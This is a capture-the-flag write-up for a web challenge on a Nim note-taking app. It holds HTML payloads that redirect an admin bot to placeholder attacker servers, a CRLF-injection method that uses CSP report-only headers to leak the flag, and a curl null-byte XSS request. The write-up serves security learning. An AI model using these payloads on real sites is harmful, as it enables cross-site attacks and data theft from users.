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Nim Notes

  • Category: Web
  • Score: 500/500
  • Solves: 1/428


I made this note taking web app in Nim as a part of learning it. If you have some cool notes about Nim please share it with me!


You have a simple note taking website, which allows you to use markdown to create some notes. The webiste backend is written in Nim, with a small framework called jester. You can share you notes with admin (bot), and your target is to steal the flag in admin's notes.


The bot only visits http://web/?user=xxx, so you might want to direct the bot to your own website first. Your note content are first parsed by marked then filtered by DOMPurify, so you most probably couldn't have a direct XSS (unless you have a DOMPurify 0day lol).

The trick is to notice that recaptcha v2 are used on the website too, and its documentation listed some ways to interact with it through HTML markup. Obviously, the most interesting things are data-callback and data-error-callback, they should be specified to be the name of a global function.

Is there anything interesting things can be used as a callback? Of course, there is! In /js/app.js, there's a simple function logout:

function logout() {

It simply submit the <form> with id logout-form, but the form in templates/index.html are located at the very end of HTML, which is after the notes container. If you inject a <form> with logout-form at container section, it will submit the injected one rather than the original logout one. So you can just provide your website's url to action of that form, and it will direct the bot to your site when callback are called.

<form action="YOUR_SERVER" id="logout-form">
<button type=submit class=g-recaptcha data-sitekey=invalid data-error-callback=logout data-action=submit>peko</button>

The source of this idea comes from this tweet, BTW

Update: @splitline said this technique always exist at a challenge from TWCTF 2020

After directing the bot to your website, there are one intended solution and one unintended solution (much easier and less interesting) as far as I know.

The intended solution is to use the fact that setCookie is vulnerable to CRLF Injection. Since sign function simply concat your message and hash together, your payload is directly passed into setCookie almost unmodified if you could success at login/register.

You might think it is easy to XSS after CRLF Injection, but in fact, it is not. The injection point are at Set-Cookie header, which is after the CSP header. And it is easy to found that you can't really disable CSP even if you could inject headers in modern Chromium. So you still need to find a way to bypass CSP:

default-src 'self'; script-src 'self'; frame-src;

The CSP prevents you from using inline <script> tag to XSS, but you can trying to load script with current origin. If this CSRF request are GET, you can try to construct a Javascript/HTML polyglot and force the browser to cache the response. Then make a <script> tag's src to point to itself might work. But it is a POST in this challenge, so this won't work.

Another option is trying to use the fact HTTP keep-alive are all in a single TCP connection, since Chromium only opens 6 parallel connections at the same time by default, it is possible to make them reuse same connection for HTML and the script. While this is possible in theory, but Chromium will simply disconnect immediately when it sees more content then it is expecting, so it is important to make it align to packet boundary. This is so complicated that I couldn't make it work in this challenge.

If you want to know more about this, see PlaidCTF 2021 - Carmen Sandiego and Circle City Con CTF 2021 - Sticky Notes

So it is impossible to XSS this way? I don't know, but you don't really need XSS to exfiltrate the flag. The trick is to abuse the Content-Security-Policy-Report-Only header, which allows you to specify another set of CSP rules, but it only reports the violation to a specified url without blocking it. And the reported infomation is encoded as a JSON, one of the field script-sample contains The first 40 characters of the inline script, event handler, or style that caused the violation. by MDN.

What if you can make it send the flag to your server using script-sample? See the createNote function in /js/app.js:

function createNote(note) {
	const el = document.importNode(document.getElementById('note-tmpl').content, true)
	el.querySelector('.note-title').textContent = note.title
	el.querySelector('.note-author').textContent =
	el.querySelector('.note-content').innerHTML = DOMPurify.sanitize(marked.parse(note.content))
	return el

It is expected that flag will be in admin's note.content, if .note-content element is a <script> tag then it will put the content (flag) to script-sample and send it to your server!

So it is clear that we can use CRLF Injection to set your own Content-Security-Policy-Report-Only, and the body will be a HTML with designed #note-tmpl template. You also need to load /js/app.js, /js/marked.min.js and /js/purify.min.js to make it work too. Once the bot trying to load that HTML, the violation will be triggered when it wants to set innerHTML to be the flag.

The exploit is, you need to set the public_host variable to be a publicly reachable url of that flask server. After starting it, create a note with following content and share it with admin (bot):

<form action="http://IP_OF_THIS_SERVER/csrf" id="logout-form">
<button type=submit class=g-recaptcha data-sitekey=invalid data-error-callback=logout data-action=submit>asd</button>

Then the flask server should prints the flag.

Unintended Solution

You need to direct the bot to your website first too. But the CSRF part is different here.

The trick is that when your username contains \0 (null byte), it will cause syntax error in Nim's sqlite library. This happens because it didn't uses sqlite's prepared statement.

And the error message are output directly to response by Jester, with no CSP headers.

> curl '' --data $'username=<script>alert(1)</script>%00&password=peko' -v
*   Trying
* Connected to ( port 8765 (#0)
> POST /login HTTP/1.1
> Host:
> User-Agent: curl/7.81.0
> Accept: */*
> Content-Length: 55
> Content-Type: application/x-www-form-urlencoded
* Mark bundle as not supporting multiuse
< HTTP/1.1 502 Bad Gateway
< Server: nginx
< Date: Mon, 28 Feb 2022 03:08:23 GMT
< Content-Type: text/html;charset=utf-8
< Content-Length: 343
< Connection: keep-alive
<html xmlns=""><head><title>Jester route exception</title></head><body><h1>An error has occured in one of your routes.</h1><p><b>Detail: </b>db_sqlite.nim(198)       dbError<br/>
asyncfutures.nim(389)    read<br/>
asyncfutures.nim(389)    read<br/>
* Connection #0 to host left intact
unrecognized token: "'<script>alert(1)</script>"</p></body></html>

So you have an easy XSS now, lol.